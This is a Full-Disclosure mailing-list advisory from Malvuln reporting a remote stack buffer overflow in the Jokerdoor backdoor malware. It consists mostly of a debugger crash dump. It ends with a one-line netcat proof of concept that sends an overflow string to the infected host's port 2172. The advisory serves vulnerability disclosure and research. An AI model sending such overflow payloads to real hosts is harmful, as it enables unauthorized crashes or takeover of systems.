lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 11 Dec 2021 22:11:25 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Jokerdoor / Remote Stack Buffer Overflow

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/8f18703c433b5703a7131c1afeacfd74.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Jokerdoor
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 2172. Third party attackers
who can reach an infected system can send a junk payload and trigger a
classic stack buffer overflow overwriting the ECX, EIP registers and
structured exception handler (SEH). When connecting you will get a
"connected" server response, then we supply our payload as a parameter
prefixed by "DOS" to successfully compromise the server.
Type: PE32
MD5: 8f18703c433b5703a7131c1afeacfd74
Vuln ID: MVID-2021-0426
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 12/11/2021

Memory Dump:
(ce0.3b0): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000
edi=00000000
eip=41414141 esp=000a1600 ebp=000a1620 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010246
41414141 ??              ???

0:000> .ecxr
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000
edi=00000000
eip=41414141 esp=000a1600 ebp=000a1620 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010246
41414141 ??              ???

0:000> !analyze -v
*******************************************************************************
*
  *
*                        Exception Analysis
  *
*
  *
*******************************************************************************

*** WARNING: Unable to verify checksum for
Backdoor.Win32.Jokerdoor.8f18703c433b5703a7131c1afeacfd74
*** ERROR: Module load completed but symbols could not be loaded for
Backdoor.Win32.Jokerdoor.8f18703c433b5703a7131c1afeacfd74

FAULTING_IP:
+26
41414141 ??              ???

EXCEPTION_RECORD:  0019ee34 -- (.exr 0x19ee34)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 41414141
Attempt to read from address 41414141

PROCESS_NAME:  Backdoor.Win32.Jokerdoor.8f18703c433b5703a7131c1afeacfd74

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141

FOLLOWUP_IP:
+26
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS:
+26
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's
rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which
may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0019ee84 -- (.cxr 0x19ee84)
eax=00010000 ebx=041a3c0c ecx=749feb0d edx=00000000 esi=0054078e
edi=027a0d17
eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0         nv up ei pl nz na po
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010202
41414141 ??              ???
Resetting default scope

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute
[Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 41414141 to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:
 APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_STACKIMMUNE

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_STACKIMMUNE

FRAME_ONE_INVALID: 1

STACK_TEXT:
00000000 00000000
unknown!backdoor.win32.jokerdoor.8f18703c433b5703a7131c1afeacfd74+0x0


STACK_COMMAND:  .cxr 000000000019EE84 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:
 unknown!backdoor.win32.jokerdoor.8f18703c433b5703a7131c1afeacfd74

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACK_OVERFLOW_STACKIMMUNE_c0000005_unknown!Unloaded

BUCKET_ID:
 APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_unknown!backdoor.win32.jokerdoor.8f18703c433b5703a7131c1afeacfd74



Exploit/PoC:
python -c "print('DOS'+'A'*804)" | nc64.exe MALWARE_HOST 2172
connected. 20:14 - December 11, 2021, Saturday, ver: Legends 2.1


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ